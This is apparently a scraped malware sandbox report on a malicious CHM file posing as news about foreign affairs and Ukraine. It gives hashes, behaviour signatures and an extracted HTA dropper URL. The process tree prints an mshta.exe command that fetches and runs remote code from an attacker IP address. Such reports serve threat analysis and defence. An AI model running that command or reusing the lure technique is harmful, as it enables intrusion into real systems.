Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

News about...ne.chm

windows7-x64

10

News about...ne.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    26/12/2023, 10:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    News about Foreign affairs, The High North and Ukraine.chm

  • Size

    12KB

  • MD5

    6f57f0fe127adac28241787263438e50

  • SHA1

    433b7008a3c00c41634b20c33da85b519aa58794

  • SHA256

    4f38f5347307c437d1462cdf5715b7692c54e8a1964193c4b4e079e8b25daf1e

  • SHA512

    963acc0ed2bc6bf028898680cafd1f5cb3b17cd780ff62a470fc23964c67ec8505b3049a9e620c11c9c606a31c9cbe518dbbc3b26e829b99b7fbe336e2dbb93a

  • SSDEEP

    96:COwCSVgaOJOzkZhd1t0lFZHDSxWqzlkJchb0GlrJ/:COwCeO+kZhdOPHoRBE4j5J/

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://141.105.65.165/data/8.html

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" "C:\Users\Admin\AppData\Local\Temp\News about Foreign affairs, The High North and Ukraine.chm"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://141.105.65.165/data/8.html ,
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      PID:2364

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads